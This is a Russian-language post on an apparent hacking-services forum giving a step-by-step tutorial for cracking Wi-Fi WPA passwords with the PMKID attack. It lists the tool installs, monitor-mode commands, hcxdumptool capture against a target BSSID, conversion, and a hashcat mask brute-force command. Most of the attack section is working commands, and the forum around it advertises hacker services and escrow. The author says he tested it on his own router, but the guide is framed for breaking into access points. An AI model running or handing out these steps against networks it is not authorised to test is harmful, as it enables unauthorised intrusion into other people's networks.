Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Recommended Posts

Всем привет, сегодня я хочу рассказать вам о новом способе взлома беспроводной точки доступа. Как уже многие могли убедиться, он является более эффективным чем те, что мы использовали раньше. Поэтому начем!

Способ в том, чтобы заполучить специальный ключ PMKID, что переводится как Pairwise Master Key Identifier.

Этот ключ позволяет узнать PSK – Pre-Shared Key, а именно он как раз-таки и является паролем от точки доступа. Вы спросите, чем же отличается данные метод от нам привычных? А тем, что нам не нужно получать полный хеншейк, и понадобится лишь один кадр EOPOL, ну а также еще одна отличительная черта - это то, что вам не нужно будет ждать, пока подключится какой-либо пользователь к сети, которую вы собираетесь атаковать. Связано это с тем, что атака будет производится на саму AP.

 

Необходимое для совершения атаки:

1. Linux

2. hcxtools

3. Hcxdumptool

4. Hashcat v4.2.0

 

Установка всего необходимого:

Hcstools устанавливается точно так же как и hcxdumprool

1. git clone ZerBea/hcxtools

2. cd hcxtools

3. make

4. make install

Hashcat v4.2.0

Если у вас уже присутствует эта программа, но она ниже указанной версии, то, к сожалению, или к счастью, вы будете вынуждены ее удалить, а потом установить более новою версию. Либо же обновить ее другими способами, ведь это необходимо по той причине, что прошлые версию не могут расшифровать PMKID.

1. git clone hashcat/hashcat

2. cd hashcat

3. make

4. make install

Сразу хочу сказать, для примера, я буду проводить атаку на собственный роутер, который имеет последнюю прошивку.

 

Перевод беспроводного интерфейса в режим монитора

Сделать это можно двумя методами, вот первый.

Пишем этот код:

airmon-ng start wlan0

airmon-ng check kill

 

Готово, теперь рассмотрим второй способ.

Пишем этот код:

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airmon-ng check kill

 

Запуск сканирования WiFi точек

Первым делом нам нужно запустить сканирование, сделать это можно данной командой:

airodump wlan0mon (wlan0 выбираем смотря из того, какой метод вы использовали)

После того как это будет выполнено, вам нужно будет сохранить BSSID необходимой точки AP без двоеточий в файл, сделать это можно с помощью такого кода:

echo "60A44C55D7C0" > filter.txt

 

Запуск Hcxdumptool

Запуск выполняется с помощью данной команды:

hcxdumptool –I wlan0 –o hash –filterlist=filter.txt --filtermode=2 -- enable_status=1

Теперь обо всем по порядку:

-i wlano – Эта строка указывает на название вашего интерфейса

-o hash – файл получаемый на выходе, в котором содержится PMKID

--filtermode=2 – укажет на то, что наш файл будет целевым списком

--filterlist=filter.txt – текстовый файл BSSID, который мы уже создали ранее.

--enable_status=1 – включения сообщний с помощью маски.

Теперь, когда вы все это запустите, то через некоторое время вам придет сообщение – Found PMKID, после этого мы отключаем данный скрипт. Что тут еще сказать? Данная программа на ура выполняет свои задачи и находит необходимые нам пакеты, поэтому продолжим.

 

Запуск hcxpcaptool

Для этого вводим команду:

hcxpcaptool –z hash_crack hash

Опять же расскажу, что это все значит:

-z hash_crack – это файл который мы получим нвыходе, где будет записан PMKID без лишнего мусора

Hash – файл в формате pcapng, в нем будут находится все найденые пакеты hcxdumptool

 

Запуск HASHCAT

Достаточно ввести эту команду:

hashcat –m 16800 –a 3 –w hash_crack ‘?u?s?d23456A’ --force

В этой команде я хочу сказать только про –m 16800, именно эта команда и появляется в новой версии HASHCAT

Итак, после этих действий вам будет выведет пароль по маске а также возможно два последних знака из данного пароля. Конечно, продолжать проверку больше суток я для примера не буду, поэтому введу несколько символов из своего пароля, после чего получил результат намного быстрее. А результатом как раз-таки был пароль.

На этом все, поэтому теперь можно сказать о том, что этот способ намного эффективнее других атак. Конечно скорость получения результата не так уж и сильно превосходит aircrack-ng, но если же вы имеет у себя в компьютере хорошую видеокарту, то с этим можно даже поспорить. А также, теперь вам не нужно ждать неопределенное количество временя в ожидании подключения пользователя, так как теперь не нужно будет перехватывать хеншейк.

 

Link to comment
Share on other sites

  • Реклама на форуме

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Member Statistics

    6,256
    Total Members
    30,834
    Most Online
    саня328
    Newest Member
    саня328
    Joined
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.